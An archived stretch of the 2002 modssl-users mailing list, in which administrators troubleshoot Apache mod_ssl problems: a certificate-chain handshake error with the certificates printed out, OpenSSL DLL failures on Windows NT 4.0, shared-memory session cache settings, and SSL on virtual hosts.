From owner-modssl-users@modssl.org  Thu Sep 19 19:59:09 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id TAA23211; Thu, 19 Sep 2002 19:58:10 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from unimur.um.es id TAA23203; Thu, 19 Sep 2002 19:57:44 +0200 (MET DST)
Received: from aries.dif.um.es (aries.dif.um.es [155.54.210.253])
	by unimur.um.es (8.9.1b+Sun/8.9.1) with ESMTP id RAA01933
	for ; Thu, 19 Sep 2002 17:55:47 +0200 (MEST)
Received: from dif.um.es (pirania.dif.um.es [155.54.210.33])
	by aries.dif.um.es (Postfix) with ESMTP id 137BC14431
	for ; Thu, 19 Sep 2002 17:50:35 +0200 (MET DST)
Message-ID: <3D89F2D5.8060704@dif.um.es>
Date: Thu, 19 Sep 2002 17:52:53 +0200
From: =?ISO-8859-1?Q?Gabriel_L=F3pez_Mill=E1n?= 
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.0.0) Gecko/20020529
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: verify client certificate
Content-Type: multipart/signed; protocol="application/x-pkcs7-signature"; micalg=sha1; boundary="------------ms070705060205010803060207"
Content-Transfer-Encoding: 8bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: =?ISO-8859-1?Q?Gabriel_L=F3pez_Mill=E1n?= 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

This is a cryptographically signed message in MIME format.

--------------ms070705060205010803060207
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 8bit

  Hi all.

   I have a problem with a certificate chain and a server certificate, I 
need help.
   The certificate chain is formed by the Root CA Certificate and the 
Subordinate CA Certificate below showed.
   The server certificate is the last certificate.
     I have configured apache with modssl and when i try to access to 
https://imladris.dif.um.es I get the following error:

Apache/1.3.19 (Unix) ApacheJServ/1.1.2 mod_ssl/2.8.3 OpenSSL/0.9.6g 
configured -- resuming normal operations
[Thu Sep 19 10:13:14 2002] [error] mod_ssl: SSL handshake failed (server 
imladris.dif.um.es:443, client 2001:720:1710:f00::2) (OpenSSL library 
error follows)
[Thu Sep 19 10:13:14 2002] [error] OpenSSL: error:14094412:SSL 
routines:SSL3_READ_BYTES:sslv3 alert bad certificate [Hint: Subject CN 
in certificate not server name or identical to CA!?]

   Obviously it's a mistake, server certificate's subject is the same 
than the server name (in httpd.conf file)
   and it's not a CA.

   I think the problem is in the path validation, in the NameConstraints 
extensions (2.5.29.30), but I'm not sure.
   I don't know if openssl supports this extensins and if it's well 
configured.

   Any idea?

   Thanks, Gabi.


** Root CA Certificate **

Certificate:
   Data:
       Version: 3 (0x2)
       Serial Number: 1 (0x1)
       Signature Algorithm: md5WithRSAEncryption
       Issuer: C=ES, O=umu, OU=umu, CN=PKIv6 3.2 ca root
       Validity
           Not Before: Sep 16 22:00:00 2002 GMT
           Not After : Sep 16 22:00:00 2004 GMT
       Subject: C=ES, O=umu, OU=umu, CN=PKIv6 3.2 ca root
       Subject Public Key Info:
           Public Key Algorithm: rsaEncryption
           RSA Public Key: (1024 bit)
               Modulus (1024 bit):
                   00:aa:e5:b5:5b:0a:f4:ef:79:2a:4d:8e:84:e1:ce:
                   43:59:81:2d:b6:53:8c:97:77:4f:db:07:08:69:b0:
                   68:ea:1d:cd:fe:c2:a4:a2:08:ec:ce:ed:b4:13:91:
                   dc:da:bf:27:41:ef:f1:f3:3b:96:36:97:2f:9c:f3:
                   48:21:b3:a0:34:0d:8a:e8:04:cf:d5:c2:06:dd:cf:
                   5d:ea:7c:d5:9e:ab:92:65:7a:e1:32:ee:73:f4:4f:
                   99:be:18:5c:a0:84:5c:b0:09:f0:8a:68:61:1a:94:
                   ec:c5:95:9b:10:c4:0b:4b:e9:e0:2f:48:7b:2b:23:
                   56:02:56:a7:2c:16:c4:2f:0d
               Exponent: 65537 (0x10001)
       X509v3 extensions:
           X509v3 Key Usage: critical
               Digital Signature, Certificate Sign, CRL Sign
           X509v3 Basic Constraints: critical
               CA:TRUE
           Netscape Cert Type:
               SSL Client, S/MIME, SSL CA, S/MIME CA, Object Signing CA
   Signature Algorithm: md5WithRSAEncryption


*** Subordinate CA Certificate ***

Certificate:
   Data:
       Version: 3 (0x2)
       Serial Number: 28 (0x1c)
       Signature Algorithm: md5WithRSAEncryption
       Issuer: C=ES, O=umu, OU=umu, CN=PKIv6 3.2 ca root
       Validity
           Not Before: Sep 17 11:25:36 2002 GMT
           Not After : Sep 17 11:25:36 2003 GMT
       Subject: C=ES, O=umu, OU=umu dd, CN=PKIv6 3.2 ca sub2
       Subject Public Key Info:
           Public Key Algorithm: rsaEncryption
           RSA Public Key: (512 bit)
               Modulus (512 bit):
                   00:b5:e5:36:3f:7a:29:a0:da:3a:67:60:4f:ed:52:
                   81:09:26:21:4d:a7:14:77:54:56:be:87:1d:5a:62:
                   26:89:aa:f4:00:19:e6:c5:d8:c0:68:71:0f:2b:b5:
                   7b:54:25:7f:98:2e:75:e6:65:76:b4:9f:39:99:2e:
                   56:19:b6:5e:27
               Exponent: 65537 (0x10001)
       X509v3 extensions:
           X509v3 Key Usage: critical
               Certificate Sign, CRL Sign
           2.5.29.30: critical
               0...0...umu-euro6ix dd
           X509v3 Basic Constraints: critical
               CA:TRUE
           Netscape Cert Type:
               SSL Client, S/MIME, SSL CA, S/MIME CA, Object Signing CA
   Signature Algorithm: md5WithRSAEncryption

*** Server Certificate (ServerName=imladris.dif.um.es) **

   Certificate:
   Data:
       Version: 3 (0x2)
       Serial Number: 15 (0xf)
       Signature Algorithm: md5WithRSAEncryption
       Issuer: C=ES, O=umu, OU=umu dd, CN=PKIv6 3.2 ca sub2
       Validity
           Not Before: Sep 17 15:55:07 2002 GMT
           Not After : Sep 17 15:55:07 2003 GMT
       Subject: C=ES, O=umu, OU=umu dd, CN=imladris.dif.um.es
       Subject Public Key Info:
           Public Key Algorithm: rsaEncryption
           RSA Public Key: (512 bit)
               Modulus (512 bit):
                   00:b6:85:42:e5:32:6f:30:5f:69:8f:c1:93:ca:a6:
                   19:3a:67:b7:c0:d2:12:e0:7d:c2:75:0f:4e:00:30:
                   16:4f:39:fb:9a:49:5d:db:18:bb:20:b4:6b:67:df:
                   ca:96:2f:18:1e:95:b9:56:9b:19:72:9a:2a:78:b7:
                   09:d9:0f:15:37
               Exponent: 65537 (0x10001)
       X509v3 extensions:
           Netscape Cert Type:
               SSL Server, S/MIME, Object Signing
           X509v3 Basic Constraints:
               CA:FALSE
           X509v3 Subject Alternative Name:
               email:gabilm@dif.um.es
   Signature Algorithm: md5WithRSAEncryption

-- 
-------------------------------------------------
Gabriel Lopez Millan - Grupo ANTS-CIRCuS
Facultad de Informática
Universidad de Murcia (España) Tfo: +34 968367645


--------------ms070705060205010803060207
Content-Type: application/x-pkcs7-signature; name="smime.p7s"
Content-Disposition: attachment; filename="smime.p7s"
Content-Description: S/MIME Cryptographic Signature
Content-Transfer-Encoding: base64

MIAGCSqGSIb3DQEHAqCAMIACAQExCzAJBgUrDgMCGgUAMIAGCSqGSIb3DQEHAQAAoIIFqjCC
AtEwggI6oAMCAQICAU4wDQYJKoZIhvcNAQEEBQAwNjELMAkGA1UEBhMCRVMxDDAKBgNVBAoT
A1VNVTEZMBcGA1UEAxMQRXVybzZpeCBQS0kgSSBDQTAeFw0wMjA5MDIxMDA3NTlaFw0wMzA5
MDIxMDA3NTlaMEsxCzAJBgNVBAYTAkVTMQwwCgYDVQQKEwNVTVUxDzANBgNVBAsTBkNJUkN1
UzEdMBsGA1UEAxMUR2FicmllbCBMb3BleiBNaWxsYW4wgZ8wDQYJKoZIhvcNAQEBBQADgY0A
MIGJAoGBAKXTRt9kXetQDFpsekd2r7W7Lpe46QauguBWX/VaHCgstNXliWxzgjgD63ZHBZnQ
nh8FPO+N/lRp11WbT1ATn7k8zbtUix14eyPTT6CN/srVl1NWsNZAP40+dAlYs/owGB2hQETH
KYO0ySapvzjijtFItEWKbbMsZMI4mxES4i/5AgMBAAGjgdkwgdYwSAYDVR0gBEEwPzA9BgUr
BgcICTA0MDIGCCsGAQUFBwIBFiZodHRwczovLzE1NS41NC45NS42Ni9waXNjaXMvY3BzcG9p
bnRlcjAwBggrBgEFBQcBAQQkMCIwIAYIKwYBBQUHMAKGFGh0dHBzOi8vMTU1LjU0Ljk1LjY2
MBEGCWCGSAGG+EIBAQQEAwIFoDAJBgNVHRMEAjAAMB0GA1UdJQQWMBQGCCsGAQUFBwMCBggr
BgEFBQcDBDAbBgNVHREEFDASgRBnYWJpbG1AZGlmLnVtLmVzMA0GCSqGSIb3DQEBBAUAA4GB
AK5k8njocBtGpwDWQMjV11x4wZYuDlBnN+xagUU+21JKNlktBQnCh23YL4Fn+ida/C8SXMP/
DfLG+FgaCoq4G4md5LKkO++xFIiUZ4Ei5/B5ZEa3l0iljG4TpbE77Ta4wWH4Zu9vexudi5yw
6QPJdSR1CwyATtdFyvWc5mHaeGhqMIIC0TCCAjqgAwIBAgIBTjANBgkqhkiG9w0BAQQFADA2
MQswCQYDVQQGEwJFUzEMMAoGA1UEChMDVU1VMRkwFwYDVQQDExBFdXJvNml4IFBLSSBJIENB
MB4XDTAyMDkwMjEwMDc1OVoXDTAzMDkwMjEwMDc1OVowSzELMAkGA1UEBhMCRVMxDDAKBgNV
BAoTA1VNVTEPMA0GA1UECxMGQ0lSQ3VTMR0wGwYDVQQDExRHYWJyaWVsIExvcGV6IE1pbGxh
bjCBnzANBgkqhkiG9w0BAQEFAAOBjQAwgYkCgYEApdNG32Rd61AMWmx6R3avtbsul7jpBq6C
4FZf9VocKCy01eWJbHOCOAPrdkcFmdCeHwU8743+VGnXVZtPUBOfuTzNu1SLHXh7I9NPoI3+
ytWXU1aw1kA/jT50CViz+jAYHaFARMcpg7TJJqm/OOKO0Ui0RYptsyxkwjibERLiL/kCAwEA
AaOB2TCB1jBIBgNVHSAEQTA/MD0GBSsGBwgJMDQwMgYIKwYBBQUHAgEWJmh0dHBzOi8vMTU1
LjU0Ljk1LjY2L3Bpc2Npcy9jcHNwb2ludGVyMDAGCCsGAQUFBwEBBCQwIjAgBggrBgEFBQcw
AoYUaHR0cHM6Ly8xNTUuNTQuOTUuNjYwEQYJYIZIAYb4QgEBBAQDAgWgMAkGA1UdEwQCMAAw
HQYDVR0lBBYwFAYIKwYBBQUHAwIGCCsGAQUFBwMEMBsGA1UdEQQUMBKBEGdhYmlsbUBkaWYu
dW0uZXMwDQYJKoZIhvcNAQEEBQADgYEArmTyeOhwG0anANZAyNXXXHjBli4OUGc37FqBRT7b
Uko2WS0FCcKHbdgvgWf6J1r8LxJcw/8N8sb4WBoKirgbiZ3ksqQ777EUiJRngSLn8HlkRreX
SKWMbhOlsTvtNrjBYfhm7297G52LnLDpA8l1JHULDIBO10XK9ZzmYdp4aGoxggHjMIIB3wIB
ATA7MDYxCzAJBgNVBAYTAkVTMQwwCgYDVQQKEwNVTVUxGTAXBgNVBAMTEEV1cm82aXggUEtJ
IEkgQ0ECAU4wCQYFKw4DAhoFAKCB/zAYBgkqhkiG9w0BCQMxCwYJKoZIhvcNAQcBMBwGCSqG
SIb3DQEJBTEPFw0wMjA5MTkxNTUyNTNaMCMGCSqGSIb3DQEJBDEWBBShFEjdFQ1z9S/XZ7fs
6mRudx7mMTBMBgsqhkiG9w0BCRACCzE9oDswNjELMAkGA1UEBhMCRVMxDDAKBgNVBAoTA1VN
VTEZMBcGA1UEAxMQRXVybzZpeCBQS0kgSSBDQQIBTjBSBgkqhkiG9w0BCQ8xRTBDMAoGCCqG
SIb3DQMHMA4GCCqGSIb3DQMCAgIAgDANBggqhkiG9w0DAgIBQDAHBgUrDgMCBzANBggqhkiG
9w0DAgIBKDANBgkqhkiG9w0BAQEFAASBgAiGkafYUwQgU77HpiI4qzZPOKGEujZPdnvArUqW
S9aZiQFhxMWSoMy0OkHkw3ZiJTgGmDvTBZtgwhFJtVfe+WsEATaRJaEVYlcKougz5dPH9qP4
UeGryc+5OY5+fjEv4tj3uC+B+5D0/h3UKmP1f0XL0YsVsYXLSi1BeftDxjYfAAAAAAAA
--------------ms070705060205010803060207--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Sep 19 20:14:05 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id UAA23920; Thu, 19 Sep 2002 20:13:10 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from atlaspdc.atlas-tech.com id UAA23916; Thu, 19 Sep 2002 20:12:59 +0200 (MET DST)
Received: from atlas-tech.com (sc021ws036.nosc.mil [198.253.21.36]) by atlaspdc.atlas-tech.com with SMTP (Microsoft Exchange Internet Mail Service Version 5.5.2650.21)
	id Q5ZYY0JN; Thu, 19 Sep 2002 14:11:44 -0400
Message-ID: <3D8A140E.BF431256@atlas-tech.com>
Date: Thu, 19 Sep 2002 14:14:38 -0400
From: David Diehl 
X-Mailer: Mozilla 4.73 [en] (Windows NT 5.0; U)
X-Accept-Language: en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Mod_SSL_2.8.10 and OpenSSL_0.9.6g
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: David Diehl 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Has anybody got this to function on a NT 4.0 server?

I've downloaded and compiled apache 1.3.26 with modssl 2.8.10 and
openssl 9.6g and can't seem to get it to work on a NT 4.0 server. It
works fine on a windows 2000 server, but when I try and start it on a NT
4.0 server the second apache process never starts and there are no error
indications in the log files.

I've also download 2 seperate precompiled builds and niether of them
came with the openssl dll files libeay32.dll and ssleay32.dll, which
normally reside in the system32 directory. If I use the ones I compiled,
the same symptoms occur. Of course, if I remove all SSL directives from
the httpd.conf file, I don't need the dll's and it functions properly.

It seems that any version prior to 9.6 i.e. 9.5a  functions without any
problems.

Any ideas or insight would be greatly appreciated.

Thanks

David

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Sep 19 20:29:54 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id UAA24441; Thu, 19 Sep 2002 20:28:21 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from battersbox.nameconnector.com id UAA24434; Thu, 19 Sep 2002 20:27:51 +0200 (MET DST)
Received: from MAILBOX.nameconnector.com ([10.1.64.1]) by battersbox.nameconnector.com with Microsoft SMTPSVC(5.0.2195.5329);
	 Thu, 19 Sep 2002 14:27:42 -0400
Received: by mailbox.nameconnector.com with Internet Mail Service (5.5.2653.19)
	id ; Thu, 19 Sep 2002 14:27:42 -0400
Message-ID: <61957B071FF421419E567A28A45C7FE5400ED4@mailbox.nameconnector.com>
From: Geoffrey Talvola 
To: "'modssl-users@modssl.org'" 
Subject: RE: Mod_SSL_2.8.10 and OpenSSL_0.9.6g
Date: Thu, 19 Sep 2002 14:27:41 -0400
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
Content-Type: text/plain;
	charset="iso-8859-1"
X-OriginalArrivalTime: 19 Sep 2002 18:27:42.0478 (UTC) FILETIME=[3DEE92E0:01C2600A]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Geoffrey Talvola 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

I'm using the binaries from the OpenSA package and they are working fine for
me, both on NT and on 2000.

details at http://www.opensa.org/development/news/101.html

- Geoff

> -----Original Message-----
> From: David Diehl [mailto:ddiehl@atlas-tech.com]
> Sent: Thursday, September 19, 2002 2:15 PM
> To: modssl-users@modssl.org
> Subject: Mod_SSL_2.8.10 and OpenSSL_0.9.6g
> 
> 
> Has anybody got this to function on a NT 4.0 server?
> 
> I've downloaded and compiled apache 1.3.26 with modssl 2.8.10 and
> openssl 9.6g and can't seem to get it to work on a NT 4.0 server. It
> works fine on a windows 2000 server, but when I try and start 
> it on a NT
> 4.0 server the second apache process never starts and there 
> are no error
> indications in the log files.
> 
> I've also download 2 seperate precompiled builds and niether of them
> came with the openssl dll files libeay32.dll and ssleay32.dll, which
> normally reside in the system32 directory. If I use the ones 
> I compiled,
> the same symptoms occur. Of course, if I remove all SSL 
> directives from
> the httpd.conf file, I don't need the dll's and it functions properly.
> 
> It seems that any version prior to 9.6 i.e. 9.5a  functions 
> without any
> problems.
> 
> Any ideas or insight would be greatly appreciated.
> 
> Thanks
> 
> David
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Sep 19 21:03:17 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id VAA25152; Thu, 19 Sep 2002 21:02:33 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from agamemnon.cnchost.com id VAA25143; Thu, 19 Sep 2002 21:01:43 +0200 (MET DST)
Received: from LAP012 (host-30.whitepj.net [63.145.241.30] (may be forged))
	by agamemnon.cnchost.com
	id PAA29754; Thu, 19 Sep 2002 15:01:28 -0400 (EDT)
	[ConcentricHost SMTP Relay 1.14]
From: "Gilles Gros" 
To: 
Subject: RE: Question regarding MM
Date: Thu, 19 Sep 2002 12:01:27 -0700
Message-ID: 
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0)
In-Reply-To: <5606C687D4C7D5119A5800508BF30DB401C0487E@IRVEXCH1>
Importance: Normal
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Gilles Gros" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Can you give me pointer on description of these configuration directives.

Thanks
Gilles

> -----Original Message-----
> From: owner-modssl-users@modssl.org
> [mailto:owner-modssl-users@modssl.org]On Behalf Of Lynn Gazis
> Sent: Wednesday, September 18, 2002 4:40 PM
> To: 'modssl-users@modssl.org'
> Subject: RE: Question regarding MM
> 
> 
> It lets you use shared memory session caching; the session cache 
> which gets
> the best performance is a shared memory cache, the shmcb cache.
> 
> Lynn Gazis
> 
> -----Original Message-----
> From: Gilles Gros [mailto:gillesg@whitepj.com]
> Sent: Wednesday, September 18, 2002 4:38 PM
> To: modssl-users@modssl.org
> Subject: Question regarding MM
> 
> 
> Hi,
> 
> I have a simple question, but I am still unable to find the answer in the
> docs.
> 
> What are the use and benefit of using MM with mod_ssl?
> 
> Thank you for your insight.
> 
> Gilles
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Sep 19 21:20:08 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id VAA25955; Thu, 19 Sep 2002 21:19:21 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from irvexch1.rainbow.com id VAA25759; Thu, 19 Sep 2002 21:18:34 +0200 (MET DST)
Received: by IRVEXCH1 with Internet Mail Service (5.5.2653.19)
	id ; Thu, 19 Sep 2002 12:18:03 -0700
Message-ID: <5606C687D4C7D5119A5800508BF30DB401C04885@IRVEXCH1>
From: Lynn Gazis 
To: "'modssl-users@modssl.org'" 
Subject: RE: Question regarding MM
Date: Thu, 19 Sep 2002 12:18:01 -0700
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Lynn Gazis 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Once you have installed Apache 1.3.x, you have in your conf directory an
httpd.conf file which contains the lines:

#   Inter-Process Session Cache:
#   Configure the SSL Session Cache: First the mechanism 
#   to use and second the expiring timeout (in seconds).
#SSLSessionCache        none
#SSLSessionCache        shmht:/usr/local/apache/logs/ssl_scache(512000)
#SSLSessionCache        shmcb:/usr/local/apache/logs/ssl_scache(512000)
SSLSessionCache         dbm:/usr/local/apache/logs/ssl_scache
SSLSessionCacheTimeout  300

(In the case of Apache 2.0.x, these lines would be in ssl.conf, and you
wouldn't be using modssl, since that is built into the Apache 2.0
distribution already.)

The best performance session caching comes if you change these lines to:

#   Inter-Process Session Cache:
#   Configure the SSL Session Cache: First the mechanism 
#   to use and second the expiring timeout (in seconds).
#SSLSessionCache        none
#SSLSessionCache        shmht:/usr/local/apache/logs/ssl_scache(512000)
SSLSessionCache        shmcb:/usr/local/apache/logs/ssl_scache(512000)
#SSLSessionCache         dbm:/usr/local/apache/logs/ssl_scache
SSLSessionCacheTimeout  300

to turn on the shmcb session cache instead of the dbm one.  However, in
order for this to work, you will likely need to use the MM package (which
can be downloaded from http://www.ossp.org/pkg/lib/mm/ - see that site for
further information about this package).

Lynn Gazis

-----Original Message-----
From: Gilles Gros [mailto:gillesg@whitepj.com]
Sent: Thursday, September 19, 2002 12:01 PM
To: modssl-users@modssl.org
Subject: RE: Question regarding MM


Can you give me pointer on description of these configuration directives.

Thanks
Gilles

> -----Original Message-----
> From: owner-modssl-users@modssl.org
> [mailto:owner-modssl-users@modssl.org]On Behalf Of Lynn Gazis
> Sent: Wednesday, September 18, 2002 4:40 PM
> To: 'modssl-users@modssl.org'
> Subject: RE: Question regarding MM
> 
> 
> It lets you use shared memory session caching; the session cache 
> which gets
> the best performance is a shared memory cache, the shmcb cache.
> 
> Lynn Gazis
> 
> -----Original Message-----
> From: Gilles Gros [mailto:gillesg@whitepj.com]
> Sent: Wednesday, September 18, 2002 4:38 PM
> To: modssl-users@modssl.org
> Subject: Question regarding MM
> 
> 
> Hi,
> 
> I have a simple question, but I am still unable to find the answer in the
> docs.
> 
> What are the use and benefit of using MM with mod_ssl?
> 
> Thank you for your insight.
> 
> Gilles
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Sep 20 00:46:10 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id AAA01815; Fri, 20 Sep 2002 00:45:25 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mhro1.mayo.edu id AAA01762; Fri, 20 Sep 2002 00:44:30 +0200 (MET DST)
Received: from fermat.mayo.edu by mhro1.mayo.edu with ESMTP for modssl-users@modssl.org; Thu, 19 Sep 2002 17:44:25 -0500
Received: from doorstop (doorstop.mayo.edu [129.176.212.87])
	by fermat.mayo.edu (8.8.8+Sun/8.8.8) with SMTP id RAA25391
	for ; Thu, 19 Sep 2002 17:44:59 -0500 (CDT)
From: "Paul Bleimeyer" 
To: 
Subject: RE: Mod_SSL_2.8.10 and OpenSSL_0.9.6g
Date: Thu, 19 Sep 2002 17:42:03 -0500
Message-Id: <00a001c2602d$c6e311c0$57d4b081@doorstop>
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook CWS, Build 9.0.2416 (9.0.2910.0)
In-Reply-To: <61957B071FF421419E567A28A45C7FE5400ED4@mailbox.nameconnector.com>
Importance: Normal
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Paul Bleimeyer" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Geoff,

Are you running 1.x or 2.40 apache?

Regards,

Paul


> -----Original Message-----
> From: owner-modssl-users@modssl.org
> [mailto:owner-modssl-users@modssl.org]On Behalf Of Geoffrey Talvola
> Sent: Thursday, September 19, 2002 1:28 PM
> To: 'modssl-users@modssl.org'
> Subject: RE: Mod_SSL_2.8.10 and OpenSSL_0.9.6g
> 
> 
> I'm using the binaries from the OpenSA package and they are 
> working fine for
> me, both on NT and on 2000.
> 
> details at http://www.opensa.org/development/news/101.html
> 
> - Geoff
> 
> > -----Original Message-----
> > From: David Diehl [mailto:ddiehl@atlas-tech.com]
> > Sent: Thursday, September 19, 2002 2:15 PM
> > To: modssl-users@modssl.org
> > Subject: Mod_SSL_2.8.10 and OpenSSL_0.9.6g
> > 
> > 
> > Has anybody got this to function on a NT 4.0 server?
> > 
> > I've downloaded and compiled apache 1.3.26 with modssl 2.8.10 and
> > openssl 9.6g and can't seem to get it to work on a NT 4.0 server. It
> > works fine on a windows 2000 server, but when I try and start 
> > it on a NT
> > 4.0 server the second apache process never starts and there 
> > are no error
> > indications in the log files.
> > 
> > I've also download 2 seperate precompiled builds and niether of them
> > came with the openssl dll files libeay32.dll and ssleay32.dll, which
> > normally reside in the system32 directory. If I use the ones 
> > I compiled,
> > the same symptoms occur. Of course, if I remove all SSL 
> > directives from
> > the httpd.conf file, I don't need the dll's and it 
> functions properly.
> > 
> > It seems that any version prior to 9.6 i.e. 9.5a  functions 
> > without any
> > problems.
> > 
> > Any ideas or insight would be greatly appreciated.
> > 
> > Thanks
> > 
> > David
> > 
> > 
> ______________________________________________________________________
> > Apache Interface to OpenSSL (mod_ssl)                   
> www.modssl.org
> > User Support Mailing List                      
> modssl-users@modssl.org
> > Automated List Manager                            
> majordomo@modssl.org
> > 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Sep 20 08:20:12 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id IAA10963; Fri, 20 Sep 2002 08:19:06 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id IAA10952; Fri, 20 Sep 2002 08:18:07 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 8EEEA4CE73E; Fri, 20 Sep 2002 08:18:07 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 79E64286BB; Fri, 20 Sep 2002 08:16:47 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from emanpe03.jpmorgan.com id WAA27622; Thu, 19 Sep 2002 22:17:39 +0200 (MET DST)
From: jay.madhavan@jpmorgan.com
Received: from nyc-ntgw-n01.ny.jpmorgan.com ([10.21.8.18])
	by emanpe03.jpmorgan.com (8.9.1a/8.9.1) with ESMTP id QAA17438
	for ; Thu, 19 Sep 2002 16:13:18 -0400 (EDT)
Expiry-Date: Wed, 18 Dec 2002 -1:-1:-1 +0000
Subject: mod_ssl on multiple virtual hosts
To: modssl-users@modssl.org
Date: Thu, 19 Sep 2002 16:17:28 -0400
Message-ID: 
X-MIMETrack: Serialize by Router on NYC_SMTPMTA_02(Release 5.0.9a |January 7, 2002) at
 09/19/2002 04:17:30 PM
MIME-Version: 1.0
Content-type: text/plain; charset=us-ascii
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: jay.madhavan@jpmorgan.com
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


Hi,
   Could anyone tell me whether I can enable multiple virtual hosts (with
ssl enabled  with mod-ssl)  on Apache version 1.3.26 ? I am using this as a
reverse proxy with multiple virtual hosts.

 If you could help me please send the info at jay.madhavan@jpmorgan.com

Thanks
 Jay



This communication is for informational purposes only.  It is not intended as
an offer or solicitation for the purchase or sale of any financial instrument
